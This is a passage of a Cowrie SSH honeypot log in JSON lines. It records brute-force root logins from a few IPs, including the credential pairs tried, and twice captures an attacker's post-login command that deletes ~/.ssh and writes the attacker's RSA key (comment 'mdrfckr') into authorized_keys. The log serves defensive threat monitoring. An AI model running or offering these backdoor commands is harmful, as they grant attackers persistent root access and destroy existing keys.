,"hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:41:13.020054Z","src_ip":"212.227.235.229","session":"d60c05939d59"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:41:13.992114Z","src_ip":"212.227.235.229","session":"d60c05939d59"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:41:14.225531Z","src_ip":"212.227.235.229","session":"d60c05939d59"}
{"eventid":"cowrie.session.closed","duration":"7.0","message":"Connection lost after 7.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:41:14.230144Z","src_ip":"212.227.235.229","session":"416b3d40d327"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53250,"dst_ip":"1.2.3.4","dst_port":22,"session":"138f6947f9c7","protocol":"ssh","message":"New connection: 212.227.235.229:53250 (1.2.3.4:22) [session: 138f6947f9c7]","sensor":"my-vps","timestamp":"2025-09-08T22:41:23.079106Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:41:23.079933Z","src_ip":"212.227.235.229","session":"138f6947f9c7"}
{"eventid":"cowrie.session.connect","src_ip":"124.71.151.104","src_port":52772,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f94d837d30d","protocol":"ssh","message":"New connection: 124.71.151.104:52772 (1.2.3.4:22) [session: 2f94d837d30d]","sensor":"my-vps","timestamp":"2025-09-08T22:41:23.215778Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T22:41:23.216696Z","src_ip":"124.71.151.104","session":"2f94d837d30d"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:41:23.413496Z","src_ip":"124.71.151.104","session":"2f94d837d30d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:41:25.069752Z","src_ip":"212.227.235.229","session":"138f6947f9c7"}
{"eventid":"cowrie.login.success","username":"root","password":"3edc$RFV","message":"login attempt [root/3edc$RFV] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:41:25.820916Z","src_ip":"212.227.235.229","session":"138f6947f9c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:41:26.380380Z","src_ip":"212.227.235.229","session":"138f6947f9c7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:41:26.381112Z","src_ip":"212.227.235.229","session":"138f6947f9c7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:41:26.382293Z","src_ip":"212.227.235.229","session":"138f6947f9c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:41:26.633454Z","src_ip":"212.227.235.229","session":"138f6947f9c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:41:27.197608Z","src_ip":"212.227.235.229","session":"138f6947f9c7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:41:27.198475Z","src_ip":"212.227.235.229","session":"138f6947f9c7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:41:27.450394Z","src_ip":"212.227.235.229","session":"138f6947f9c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:41:27.451412Z","src_ip":"212.227.235.229","session":"138f6947f9c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39688,"dst_ip":"1.2.3.4","dst_port":22,"session":"51f02719ede8","protocol":"ssh","message":"New connection: 212.227.235.229:39688 (1.2.3.4:22) [session: 51f02719ede8]","sensor":"my-vps","timestamp":"2025-09-08T22:41:27.707443Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:41:27.708512Z","src_ip":"212.227.235.229","session":"51f02719ede8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:41:27.961859Z","src_ip":"212.227.235.229","session":"51f02719ede8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T22:41:29.016502Z","src_ip":"212.227.235.229","session":"51f02719ede8"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:41:30.273849Z","src_ip":"212.227.235.229","session":"51f02719ede8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39700,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdf093a61e03","protocol":"ssh","message":"New connection: 212.227.235.229:39700 (1.2.3.4:22) [session: cdf093a61e03]","sensor":"my-vps","timestamp":"2025-09-08T22:41:30.519641Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:41:30.520505Z","src_ip":"212.227.235.229","session":"cdf093a61e03"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:41:30.769727Z","src_ip":"212.227.235.229","session":"cdf093a61e03"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:41:31.807471Z","src_ip":"212.227.235.229","session":"cdf093a61e03"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:41:32.059635Z","src_ip":"212.227.235.229","session":"cdf093a61e03"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:41:32.061303Z","src_ip":"212.227.235.229","session":"138f6947f9c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50316,"dst_ip":"1.2.3.4","dst_port":22,"session":"588aeba0102c","protocol":"ssh","message":"New connection: 212.227.235.229:50316 (1.2.3.4:22) [session: 588aeba0102c]","sensor":"my-vps","timestamp":"2025-09-08T22:41:33.913922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:41:33.914716Z","src_ip":"212.227.235.229","session":"588aeba0102c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:41:34.225772Z","src_ip":"212.227.235.229","session":"588aeba0102c"}
{"eventid":"cowrie.login.failed","username":"clock","password":"clock","message":"login attempt [clock/clock] failed","sensor":"my-vps","timestamp":"2025-09-08T22:41:35.510173Z","src_ip":"212.227.235.229","session":"588aeba0102c"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:41:36.823931Z","src_ip":"212.227.235.229","session":"588aeba0102c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32980,"dst_ip":"1.2.3.4","dst_port":22,"session":"a277e4332caa","protocol":"ssh","message":"New connection: 212.227.235.229:32980 (1.2.3.4:22) [session: a277e4332caa]","sensor":"my-vps","timestamp":"2025-09-08T22:41:39.710057Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:41:39.710747Z","src_ip":"212.227.235.229","session":"a277e4332caa"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:41:39.808750Z","src_ip":"212.227.235.229","session":"a277e4332caa"}
{"eventid":"cowrie.login.failed","username":"build","password":"Password123","message":"login attempt [build/Password123] failed","sensor":"my-vps","timestamp":"2025-09-08T22:41:40.241611Z","src_ip":"212.227.235.229","session":"a277e4332caa"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:41:41.341787Z","src_ip":"212.227.235.229","session":"a277e4332caa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55028,"dst_ip":"1.2.3.4","dst_port":22,"session":"d6aed2d07115","protocol":"ssh","message":"New connection: 212.227.235.229:55028 (1.2.3.4:22) [session: d6aed2d07115]","sensor":"my-vps","timestamp":"2025-09-08T22:41:41.761659Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:41:41.818496Z","src_ip":"212.227.235.229","session":"d6aed2d07115"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T22:41:42.041478Z","src_ip":"212.227.235.229","session":"d6aed2d07115"}
{"eventid":"cowrie.login.success","username":"root","password":"3edc$RFV","message":"login attempt [root/3edc$RFV] succeeded","sensor":"my-vps","timestamp":"2025-09-08T22:41:43.041805Z","src_ip":"212.227.235.229","session":"d6aed2d07115"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:41:43.541312Z","src_ip":"212.227.235.229","session":"d6aed2d07115"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:41:43.542026Z","src_ip":"212.227.235.229","session":"d6aed2d07115"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T22:41:43.542933Z","src_ip":"212.227.235.229","session":"d6aed2d07115"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:41:43.786917Z","src_ip":"212.227.235.229","session":"d6aed2d07115"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T22:41:44.343410Z","src_ip":"212.227.235.229","session":"d6aed2d07115"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T22:41:44.344115Z","src_ip":"212.227.235.229","session":"d6aed2d07115"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T22:41:44.524095Z","src_ip":"212.227.235.229","session":"d6aed2d07115"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T22:41:44.524975Z","src_ip":"212.227.235.229","session":"d6aed2d07115"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56102,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4ae393e3b0e","protocol":"ssh","message":"New connection: 212.227.235.229:56102 (1.2.3.4:22) [session: c4ae393e3b0e]","sensor":"my-vps","timestamp":"2025-09-08T22:41:44.764595Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T22:41:44.775788Z","src_ip":"212.227.235.229","session":"c4ae393e3b0e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 